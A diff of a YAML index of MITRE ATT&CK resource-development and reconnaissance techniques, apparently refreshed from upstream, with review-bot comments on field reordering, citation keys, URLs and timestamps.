Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -54217,22 +54832,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
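Review bot: Almost all of the 50-odd removed and re-added lines for T1588 are key and list reordering (`external_references` entries and the `source_name`/`description`/`url` keys within them come out in a different order), which hides the two real changes: the Recorded Future URL moves from `/cobalt-strike-servers/` to `/research/cobalt-strike-servers` with a new retrieval date, and `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0. Emitting keys in a fixed order (for example sorted, or in the order the upstream STIX object uses) would make future refreshes reviewable line by line.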
@@ -54295,37 +54954,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
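Review bot: The T1584.007 description is a double-quoted scalar wrapped at a fixed column, so adding "or Google Apps Scripts" and the new `(Citation: GWS Apps Script Abuse 2021)` reflows every following line and the hunk reads as a rewrite rather than a two-phrase edit. Consider rendering descriptions as block scalars (`|-`), as T1608.006 and T1587 already are, so text changes diff cleanly; the matching `external_references` entry for the new citation key is added in the following hunk, so the reference is resolvable.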
@@ -54349,11 +55009,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
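Review bot: The new reference URL ends in `#google_vignette`, which is an ad-interstitial fragment picked up from the browser session, not part of the canonical BleepingComputer URL. Strip the fragment (or, if the index must mirror upstream verbatim, flag it upstream), since link checkers and dedup logic will treat it as a distinct URL.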
@@ -54411,17 +55074,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
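Review bot: In the new T1608.006 paragraph, "popularity(Citation: Chexmarx-seo)" is missing the space before the citation marker that every other citation in this description has, and the key is spelled "Chexmarx" where the companion key two sentences later is "Checkmarx-oss-seo". If this mirrors upstream ATT&CK text it cannot be changed here, but it is worth reporting upstream.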
@@ -54429,7 +55093,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -54443,7 +55107,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -54476,11 +55140,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
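Review bot: `source_name: Chexmarx-seo` is spelled inconsistently with `Checkmarx-oss-seo` in the entry right below it, and both resolve to Checkmarx authors. The key must stay identical to the `(Citation: Chexmarx-seo)` marker in the description added earlier in this diff, so correct it in both places or leave both as they are; fixing only one side breaks citation resolution.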
@@ -54502,7 +55173,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
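Review bot: `modified` for T1588.003 regresses from 2022-04-25 to 2021-10-17, over a year older than the value being replaced. If the upstream data set deliberately restored the pre-bulk-update timestamp this is fine, but it should be stated in the PR so reviewers do not read it as a stale source.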
@@ -54520,47 +55191,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
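Review bot: For T1588.003 (top of the hunk) both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed and no replacement `x_mitre_attack_spec_version` line is visible in the hunk, whereas T1588 and T1587 get `x_mitre_attack_spec_version: 3.2.0` re-added elsewhere in their blocks. Confirm the field is emitted earlier in the T1588.003 block outside the hunk context; otherwise this entry silently loses its spec version.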
@@ -54569,21 +55203,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
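Review bot: The five T1587 references are unchanged in content and only reordered, so this part of the hunk is churn. One thing worth a look while the block is touched: the Mandiant APT1 entry keeps its `fireeye.com` URL, while the FireEye supply-chain reference under T1588 in this same diff has already been moved to `mandiant.com`; check that the FireEye link still resolves.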
@@ -54623,7 +55293,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
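Review bot: Same backwards `modified` move as on T1588.003, here from 2022-04-25 to 2021-04-15 for T1588.005; see the earlier comment about confirming the source snapshot.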
@@ -54642,15 +55312,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
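Review bot: At the top of the hunk, T1588.005 loses `x_mitre_attack_spec_version: 2.1.0` with no replacement visible, the same pattern as T1588.003 above. Verify the field is written elsewhere in the block before merging.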
@@ -54658,19 +55326,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -54704,55 +55372,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
